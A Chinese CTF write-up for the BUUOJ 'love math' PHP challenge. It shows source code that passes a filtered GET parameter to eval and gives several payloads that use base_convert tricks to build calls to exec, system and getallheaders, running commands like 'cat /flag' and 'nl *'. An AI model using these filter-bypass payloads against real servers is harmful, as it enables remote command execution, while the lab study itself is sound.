简介
原题复现:
考察知识点:无参数命令执行
线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题
源码审计
代码
1 php 2 error_reporting(0); 3 //听说你很喜欢数学,不知道你是否爱它胜过爱flag 4 if(!isset($_GET['c'])){ 5 show_source(__FILE__); 6 }else{ 7 //例子 c=20-1 8 $content = $_GET['c']; 9 if (strlen($content) >= 80) { 10 die("太长了不会算"); 11 } 12 $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]']; 13 foreach ($blacklist as $blackitem) { 14 if (preg_match('/' . $blackitem . '/m', $content)) { 15 die("请不要输入奇奇怪怪的字符"); 16 } 17 } 18 //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp 19 $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh']; 20 preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); 21 foreach ($used_funcs[0] as $func) { 22 if (!in_array($func, $whitelist)) { 23 die("请不要输入奇奇怪怪的函数"); 24 } 25 } 26 //帮你算出答案 27 eval('echo '.$content.';'); 28 }
分析
首先get接受一个值而值的长度不能大于等于80
这是一个黑名单验证 不允许里面的值传入
这是一个白名单验证仅允许名单里面的传入
总结:来源:https://www.cnblogs.com/wangtanzhi/p/12246731.html
1.payload长度不能超过80
2.payload中不能包含' ', '\t', '\r', '\n',''', '"', '`', '[', ']' 这些字符
3.payload中不能有不是$whitelist白名单里面的单词出现,比如
abs(1)能过
1abs()能过
absa()不能过
abs(a)不能过
abs()a不能过
第一种方法:getallheaders()
环境:PHP 7.3 看wp说这种方法仅适用于linux +php7.3以上
getallheaders — 获取全部 HTTP 请求头信息 成功返回所有头信息数组,失败返回False 5.5.7 此函数可用于 CLI server。 5.4.0 此函数可用于 FastCGI。 此前仅在PHP以 Apache 模块方式运行时支持。
首先调用base_convert函数,将十进制转为其他进制让长度缩减
base_convert(number,frombase,tobase)函数在任意进制之间转换数字。 number 必需 原始值 frombase 必需,数字原来的进制 tobase 必需 要转换的进制
利用getallheader()来控制请求头,
$pi(696468,10,36)------>exec $pi(8768397090111664438,10,30) ------>getallheaders
让第一个返回的元素为cat flag
1:cat /flag
payload:
$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1}) //exec(getallheaders(){1}) 虽然过滤了[]但是可以使用{}来读取
方法二方法:直接getflag
//exec('hex2bin(dechex(109270211257898))') => exec('cat f*') ($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898))) //system('cat'.dechex(16)^asinh^pi) => system('cat *') base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
dechex() 函数把十进制转换为十六进制。 hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。
此方法未尝试成功因为flag不再当前目录
第三种方法:待研究。。。
https://www.cnblogs.com/wangtanzhi/p/12246731.html
第四种:读取当前目录下所有文件
dechex() 函数把十进制转换为十六进制。
hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。
base_convert(1751504350,10,36) -------->system
$pi(1438255411,14,34) ------>hex2bin
dechex(1852579882) ----->将十进制转为十六进制:6e6c202a(字符串形式是:nl *)
payload
($pi=base_convert)(1751504350,10,36)($pi(1438255411,14,34)(dechex(1852579882)))